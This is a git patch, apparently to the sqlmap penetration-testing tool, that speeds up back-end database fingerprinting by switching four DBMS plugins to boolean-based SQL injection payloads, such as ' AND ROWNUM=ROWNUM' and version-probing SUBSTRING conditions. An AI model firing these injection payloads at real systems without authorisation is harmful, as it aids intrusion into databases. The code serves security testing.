From 79c8d63b883287f85c5e48046badaab8139e47ad Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 22 Dec 2008 23:26:44 +0000 Subject: [PATCH] Major speed increase in DBMS basic fingerprint --- plugins/dbms/mssqlserver.py | 26 ++++++++++++++++---------- plugins/dbms/mysql.py | 11 +++++++---- plugins/dbms/oracle.py | 17 +++++++++++------ plugins/dbms/postgresql.py | 13 +++++++++---- 4 files changed, 43 insertions(+), 24 deletions(-) diff --git a/plugins/dbms/mssqlserver.py b/plugins/dbms/mssqlserver.py index 150e85577..0ff4f10e2 100644 --- a/plugins/dbms/mssqlserver.py +++ b/plugins/dbms/mssqlserver.py @@ -177,18 +177,24 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover): logger.info(logMsg) randInt = str(randomInt(1)) - query = "LTRIM(STR(LEN(%s)))" % randInt - if inject.getValue(query) == "1": - query = "SELECT SUBSTRING((@@VERSION), 25, 1)" - version = inject.getValue(query) + payload = agent.fullPayload(" AND LTRIM(STR(LEN(%s)))='%s'" % (randInt, randInt)) + result = Request.queryPage(payload) - if version == "8": - kb.dbmsVersion = ["2008"] - elif version == "5": - kb.dbmsVersion = ["2005"] - elif version == "0": - kb.dbmsVersion = ["2000"] + if result == True: + for version in ( 0, 5, 8 ): + payload = agent.fullPayload(" AND SUBSTRING((@@VERSION), 25, 1)='%d'" % version) + result = Request.queryPage(payload) + + if result == True: + if version == 8: + kb.dbmsVersion = ["2008"] + elif version == 5: + kb.dbmsVersion = ["2005"] + elif version == 0: + kb.dbmsVersion = ["2000"] + + break if kb.dbmsVersion: setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0]) diff --git a/plugins/dbms/mysql.py b/plugins/dbms/mysql.py index b1456cf32..bd33fe0cb 100644 --- a/plugins/dbms/mysql.py +++ b/plugins/dbms/mysql.py @@ -249,15 +249,18 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover): logger.info(logMsg) randInt = str(randomInt(1)) - query = "CONCAT('%s', '%s')" % (randInt, randInt) - if inject.getValue(query) == (randInt * 2): + payload = agent.fullPayload(" AND CONNECTION_ID()=CONNECTION_ID()") + result = Request.queryPage(payload) + + if result == True: logMsg = "confirming MySQL" logger.info(logMsg) - query = "LENGTH('%s')" % randInt + payload = agent.fullPayload(" AND CONCAT('%s', '%s')='%s%s'" % (randInt, randInt, randInt, randInt)) + result = Request.queryPage(payload) - if not inject.getValue(query) == "1": + if result != True: warnMsg = "the back-end DMBS is not MySQL" logger.warn(warnMsg) diff --git a/plugins/dbms/oracle.py b/plugins/dbms/oracle.py index e39b76d33..b7ea11c53 100644 --- a/plugins/dbms/oracle.py +++ b/plugins/dbms/oracle.py @@ -26,6 +26,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import re +from lib.core.agent import agent from lib.core.common import formatDBMSfp from lib.core.common import formatFingerprint from lib.core.common import getHtmlErrorFp @@ -38,6 +39,7 @@ from lib.core.settings import ORACLE_ALIASES from lib.core.settings import ORACLE_SYSTEM_DBS from lib.core.unescaper import unescaper from lib.request import inject +from lib.request.connect import Connect as Request from plugins.generic.enumeration import Enumeration from plugins.generic.filesystem import Filesystem @@ -163,17 +165,17 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover): logMsg = "testing Oracle" logger.info(logMsg) - query = "LENGTH(SYSDATE)" - sysdate = inject.getValue(query) + payload = agent.fullPayload(" AND ROWNUM=ROWNUM") + result = Request.queryPage(payload) - if sysdate and int(sysdate) > 0: + if result == True: logMsg = "confirming Oracle" logger.info(logMsg) - query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1" - version = inject.getValue(query) + payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)") + result = Request.queryPage(payload) - if not version: + if result != True: warnMsg = "the back-end DMBS is not Oracle" logger.warn(warnMsg) @@ -186,6 +188,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover): if not conf.extensiveFp: return True + query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1" + version = inject.getValue(query) + if re.search("^11", version): kb.dbmsVersion = ["11i"] elif re.search("^10", version): diff --git a/plugins/dbms/postgresql.py b/plugins/dbms/postgresql.py index 903cfcf6e..886543c55 100644 --- a/plugins/dbms/postgresql.py +++ b/plugins/dbms/postgresql.py @@ -26,6 +26,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import re +from lib.core.agent import agent from lib.core.common import formatDBMSfp from lib.core.common import formatFingerprint from lib.core.common import getHtmlErrorFp @@ -39,6 +40,7 @@ from lib.core.settings import PGSQL_ALIASES from lib.core.settings import PGSQL_SYSTEM_DBS from lib.core.unescaper import unescaper from lib.request import inject +from lib.request.connect import Connect as Request from plugins.generic.enumeration import Enumeration from plugins.generic.filesystem import Filesystem @@ -168,15 +170,18 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover): logger.info(logMsg) randInt = str(randomInt(1)) - query = "COALESCE(%s, NULL)" % randInt - if inject.getValue(query) == randInt: + payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt)) + result = Request.queryPage(payload) + + if result == True: logMsg = "confirming PostgreSQL" logger.info(logMsg) - query = "LENGTH('%s')" % randInt + payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt)) + result = Request.queryPage(payload) - if not inject.getValue(query) == "1": + if result != True: warnMsg = "the back-end DMBS is not PostgreSQL" logger.warn(warnMsg)